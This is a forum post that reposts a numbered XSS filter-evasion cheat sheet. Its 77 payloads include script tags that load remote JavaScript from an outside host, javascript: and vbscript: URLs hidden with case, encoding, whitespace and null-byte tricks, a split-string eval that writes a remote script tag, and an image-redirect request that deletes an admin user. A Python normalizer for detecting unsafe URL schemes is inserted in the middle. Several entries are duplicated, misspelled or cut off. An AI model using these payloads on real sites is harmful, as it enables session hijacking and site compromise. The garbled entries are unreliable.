There doesn't seem to be much XSS material on t00ls, so I copied this over when I came across something good; not sure whether anyone needs to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must all be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

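A defender-side check added here, not part of the original post or of the cheat sheet it copies: it undoes the javascript: URL obfuscations from items 3 to 19 (mixed case, embedded tab, newline and carriage return, NUL, leading whitespace, decimal and hex character references with and without semicolons) before classifying the scheme of src/href/background-style attributes against an allowlist. The attribute list, the scheme allowlist and the sample markup are assumptions made for this example.

```python
import html
import re
# Schemes allowed in URL-bearing attributes; everything else is rejected.
SAFE_SCHEMES = {"http", "https", "mailto"}
# URL-bearing attributes abused in the list above, with quoted or bare values.
_URL_ATTR = re.compile(
    r"""(?i)\b(src|href|background|dynsrc|lowsrc)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))"""
)

def normalize_url(value):
    """What a lenient parser ends up with: character references decoded
    (&#106; &#x6A &#0000106, with or without semicolons), then NUL, C0
    controls and whitespace removed so 'jav\\tascript', 'java\\0script' and
    ' javascript' all collapse to 'javascript'; case folded. Not for output."""
    decoded = html.unescape(value)
    return re.sub(r"[\x00-\x20\x7f]", "", decoded).lower()

def url_scheme(value):
    """Scheme of the normalized URL, or None for relative and '//host' URLs.
    Anything letter-led up to the first ':' counts (RFC 3986), so it is strict."""
    m = re.match(r"^([a-z][a-z0-9+.-]*):", normalize_url(value))
    return m.group(1) if m else None

def is_safe_url(value):
    """Relative URLs and allowlisted schemes pass; javascript:, vbscript:, etc. fail."""
    scheme = url_scheme(value)
    return scheme is None or scheme in SAFE_SCHEMES

def find_unsafe_urls(markup):
    """(attribute, raw value) for each URL attribute that fails is_safe_url.
    Host tricks (decimal/hex/octal IPs) are valid http URLs: out of scope here."""
    hits = []
    for m in _URL_ATTR.finditer(markup):
        raw = next(g for g in m.groups()[1:] if g is not None)
        if not is_safe_url(raw):
            hits.append((m.group(1).lower(), raw))
    return hits

# Constructed sample: benign links mixed with vectors from the list above.
SAMPLE = (
    '<IMG SRC="http://3w.org/x.png">'
    "<IMG SRC=JaVaScRiPt:alert('XSS')>"
    '<IMG SRC="jav&#x0A;ascript:alert(\'XSS\');">'
    '<A HREF="//www.google.com/">XSS</A>'
    '<BODY BACKGROUND="&#106;avascript:alert(\'XSS\')">'
)

if __name__ == "__main__":
    for attr, raw in find_unsafe_urls(SAMPLE):
        print(f"unsafe {attr}={raw!r} (scheme {url_scheme(raw)})")
```

Host-level tricks such as the decimal, hex and octal IPs in items 70 to 73 are valid http URLs and pass this check; they call for a host allowlist, not scheme filtering.
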
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside the Flash file, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>